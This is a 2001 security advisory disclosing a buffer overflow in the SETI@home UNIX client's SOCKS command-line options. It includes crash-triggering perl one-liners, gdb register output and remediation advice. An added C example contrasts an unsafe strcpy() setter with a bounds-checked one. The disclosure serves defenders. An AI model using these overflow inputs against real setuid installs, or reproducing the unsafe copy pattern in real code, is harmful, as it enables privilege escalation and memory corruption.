Vulnerability in SETI@home

Overview

SETI@home (http://setiathome.berkeley.edu/) is a distributed project that allows ordinary citizens to participate in the search for extraterrestrial intelligence using their computer's idle time. A buffer overflow exists in the UNIX client software.

NOTE: this vulnerability is NOT exploitable in the default installation.

Details

The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and possibly others) is vulnerable to a buffer overflow when given an over-long value for its -socks_server, -socks_user or -socks_passwd command-line option. Example:

    # ./setiathome -version
    SETI@home client.
    Platform: i386-pc-linux-gnu-gnulibc2.1
    Version: 3.03
    ...
    ...
    # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
    Segmentation fault
    # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
    Segmentation fault
    # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
    Segmentation fault
    #

Under gdb the fault lands inside strcpy(), and the 0x41414141 value in edx shows the copied "A" bytes:

    [root@seti /home/setiathome]# gdb setiathome
    GNU gdb 5.0rh-5 Red Hat Linux 7.1
    Copyright 2001 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (no debugging symbols found)...
    (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
    Starting program: /home/setiathome/setiathome -socks_server `perl -e 'print "A" x 5604;'`

    Program received signal SIGSEGV, Segmentation fault.
    0x2ab4d409 in strcpy () from /lib/libc.so.6
    (gdb) info registers
    eax            0x0              0
    ecx            0x40404040       1077952576
    edx            0x41414141       1094795585
    ebx            0xfefefeff       -16843009
    esp            0x7fffe664       0x7fffe664
    ebp            0x7fffe6bc       0x7fffe6bc
    esi            0x7ffffe28       2147483176
    edi            0x807bffd        134725629
    eip            0x2ab4d409       0x2ab4d409
    eflags         0x10246          66118
    cs             0x23             35
    ss             0x2b             43
    ds             0x2b             43
    es             0x2b             43
    fs             0x0              0
    gs             0x0              0
    fctrl          0x37f            895
    fstat          0x0              0
    ftag           0xffff           65535
    fiseg          0x0              0
    fioff          0x0              0
    foseg          0x0              0
    fooff          0x0              0
    fop            0x0              0

Solution

The SETI@home UNIX client is not installed with a setuid bit by default. If one was added to it -- perhaps to run it under a 'setiathome' account -- remove it immediately.

Vendor Status

The project director, Dr. Dave P. Anderson, was contacted via <daveaat_private> on Monday, Nov 5th. He promptly replied that this problem will be fixed in the next release.

- Joe Testa
e-mail: joetestaat_private
web page: http://hogs.rit.edu/~joet/
AIM: LordSpankatron
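As an added illustration of the defect class behind the crash above (this is not code from the SETI@home client, whose source is not shown in the advisory): a hypothetical option setter that copies an argv value with strcpy() into a fixed buffer, beside a bounded version that rejects over-long values. The struct, field name and buffer size are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical reconstruction of the pattern behind the crash: an option value
 * from argv copied into a fixed-size buffer. Struct, field and size are assumed. */
#define SOCKS_SERVER_MAX 256

struct socks_config {
    char server[SOCKS_SERVER_MAX];
};

/* Unsafe: strcpy() stops only at the NUL byte, so an argument of
 * SOCKS_SERVER_MAX bytes or more writes past the end of cfg->server. */
void set_socks_server_unsafe(struct socks_config *cfg, const char *arg)
{
    strcpy(cfg->server, arg);
}

/* Hardened: measure first, refuse what does not fit instead of truncating silently,
 * then copy with an explicit bound and a guaranteed terminator. 0 = ok, -1 = rejected. */
int set_socks_server_safe(struct socks_config *cfg, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= SOCKS_SERVER_MAX)
        return -1;
    memcpy(cfg->server, arg, len);
    cfg->server[len] = '\0';
    return 0;
}

/* Constructed input: n 'A' bytes, like the advisory's perl one-liner.
 * Returns the safe setter's verdict (0 accepted, -1 rejected). */
int safe_setter_accepts(size_t n)
{
    struct socks_config cfg;
    char *arg = malloc(n + 1);
    int rc;
    if (arg == NULL) return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    rc = set_socks_server_safe(&cfg, arg);
    free(arg);
    return rc;
}

int main(void)
{
    printf("5604 'A's: %s\n", safe_setter_accepts(5604) ? "rejected" : "accepted");
    return 0;
}
```

The same check applies to the -socks_user and -socks_passwd values; the setuid advice in the Solution section limits the impact of the bug, while the length check removes it.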
This archive was generated by hypermail 2b30 : Sun Dec 02 2001 - 16:31:41 PST